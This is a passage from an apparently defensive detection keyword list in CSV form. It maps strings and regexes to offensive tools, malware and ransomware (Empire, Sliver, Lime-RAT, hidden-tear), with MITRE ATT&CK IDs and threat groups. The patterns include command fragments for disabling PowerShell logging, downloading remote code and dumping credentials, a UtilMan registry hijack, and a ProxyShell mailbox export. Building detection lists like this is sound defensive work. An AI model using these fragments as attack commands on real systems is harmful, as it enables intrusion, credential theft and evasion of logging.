"*NetworkServiceExploit.exe*",".{0,1000}NetworkServiceExploit\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","NetworkServiceExploit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","53247"
"*nevah.juan@allfreemail.net*",".{0,1000}nevah\.juan\@allfreemail\.net.{0,1000}","offensive_tool_keyword","Dispossessor","email used by the Dispossessor ransomware group notes for data exfiltration","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Data Exfiltration","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","53249"
"*nevcorps5cvivjf6i2gm4uia7cxng5ploqny2rgrinctazjlnqr2yiyd.onion*",".{0,1000}nevcorps5cvivjf6i2gm4uia7cxng5ploqny2rgrinctazjlnqr2yiyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53250"
"*New credentials found for user * on *",".{0,1000}New\scredentials\sfound\sfor\suser\s.{0,1000}\son\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","53251"
"*New password cracked! MTLM: *",".{0,1000}New\spassword\scracked!\sMTLM\:\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","53252"
"*New PORT system. You need to create 1 pastebin and insert you ports like this 127.0.0.1:8989:7878:5656*",".{0,1000}New\sPORT\ssystem\.\sYou\sneed\sto\screate\s1\spastebin\sand\sinsert\syou\sports\slike\sthis\s127\.0\.0\.1\:8989\:7878\:5656.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","53253"
"*new session to 127.0.0.1:3000*",".{0,1000}new\ssession\sto\s127\.0\.0\.1\:3000.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","53254"
"*new Shell('127.0.0.1', 9000)*",".{0,1000}new\sShell\(\'127\.0\.0\.1\',\s9000\).{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#content","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","53255"
"*New Victim [{Environment.UserName}*",".{0,1000}New\sVictim\s\[\{Environment\.UserName\}.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","53256"
"*new WebSocket(""ws://127.0.0.1:4343"")*",".{0,1000}new\sWebSocket\(\""ws\:\/\/127\.0\.0\.1\:4343\""\).{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","53257"
"*NewAdminAccountCreation.ps1*",".{0,1000}NewAdminAccountCreation\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","53280"
"*NewConsole creates the sliver client (and console)*",".{0,1000}NewConsole\screates\sthe\ssliver\sclient\s\(and\sconsole\).{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","53281"
"*New-ElevatedPersistenceOption*",".{0,1000}New\-ElevatedPersistenceOption.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53282"
"*New-ElevatedPersistenceOption*",".{0,1000}New\-ElevatedPersistenceOption.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","53283"
"*New-GPOImmediateTask*",".{0,1000}New\-GPOImmediateTask.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","53284"
"*New-HoneyHash*",".{0,1000}New\-HoneyHash.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","New-HoneyHash.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53285"
"*New-HoneyHash.ps1*",".{0,1000}New\-HoneyHash\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53286"
"*New-InMemoryModule -ModuleName Win32*",".{0,1000}New\-InMemoryModule\s\-ModuleName\sWin32.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53287"
"*New-InMemoryModule*",".{0,1000}New\-InMemoryModule.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUACTokenManipulation.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53288"
"*New-Item $C2Output *",".{0,1000}New\-Item\s\$C2Output\s.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","53289"
"*New-ItemProperty * ""EnableModuleLogging"" -PropertyType DWord -Value 0*",".{0,1000}New\-ItemProperty\s.{0,1000}\s\""EnableModuleLogging\""\s\-PropertyType\sDWord\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53290"
"*New-ItemProperty * ""EnableScriptBlockLogging"" -PropertyType DWord -Value 0*",".{0,1000}New\-ItemProperty\s.{0,1000}\s\""EnableScriptBlockLogging\""\s\-PropertyType\sDWord\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53291"
"*New-ItemProperty -Path ""HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UtilMan.exe"" -Name *",".{0,1000}New\-ItemProperty\s\-Path\s\""HKLM\:\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\UtilMan\.exe\""\s\-Name\s.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","#registry","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","53292"
"*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*",".{0,1000}New\-MailBoxExportRequest\s\-Mailbox\s.{0,1000}\@.{0,1000}\s\-FilePath\s.{0,1000}\.aspx.{0,1000}","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell  CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53296"
"*New-NetFirewallRule -DisplayName ""KematianC2"" *",".{0,1000}New\-NetFirewallRule\s\-DisplayName\s\""KematianC2\""\s.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","#firewallrulename","N/A","10","","N/A","","","","53298"
"*New-NetFirewallRule -DisplayName 'Windows Update' -Direction Outbound -Action Allow*",".{0,1000}New\-NetFirewallRule\s\-DisplayName\s\'Windows\sUpdate\'\s\-Direction\sOutbound\s\-Action\sAllow.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/roadwy/DefenderYara/blob/9bbdb7f9fd3513ce30aa69cd1d88830e3cf596ca/Backdoor/Win64/PortStarter/Backdoor_Win64_PortStarter_B.yar#L8","1","0","N/A","N/A","10","10","395","63","2025-02-24T12:25:27Z","2024-02-05T13:57:05Z","53299"
"*New-Object Net.WebClient).DownloadString* -DumpCreds*",".{0,1000}New\-Object\sNet\.WebClient\)\.DownloadString.{0,1000}\s\-DumpCreds.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","53301"
"*New-Object System.Management.ManagementClass(""\\\$env:computername\root\cimv2*[""__CLASS""] = ""PMEClass""*",".{0,1000}New\-Object\sSystem\.Management\.ManagementClass\(\""\\\\\\\$env\:computername\\root\\cimv2.{0,1000}\[\""__CLASS\""\]\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","53302"
"*new-operator --name * --lhost *",".{0,1000}new\-operator\s\-\-name\s.{0,1000}\s\-\-lhost\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","53304"
"*New-PacketSMB2IoctlRequest*",".{0,1000}New\-PacketSMB2IoctlRequest.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","53305"
"*New-PodeWebNavDropdown -Name *",".{0,1000}New\-PodeWebNavDropdown\s\-Name\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","53306"
"*New-PSAmsiScanner -*",".{0,1000}New\-PSAmsiScanner\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","53307"
"*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *",".{0,1000}New\-PSDrive\s\-Name\sT\s\-PSProvider\sFileSystem\s\-Root\s\\\\\$IP\\transfer\s.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","53308"
"*New-RoutingPacket*",".{0,1000}New\-RoutingPacket.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53309"
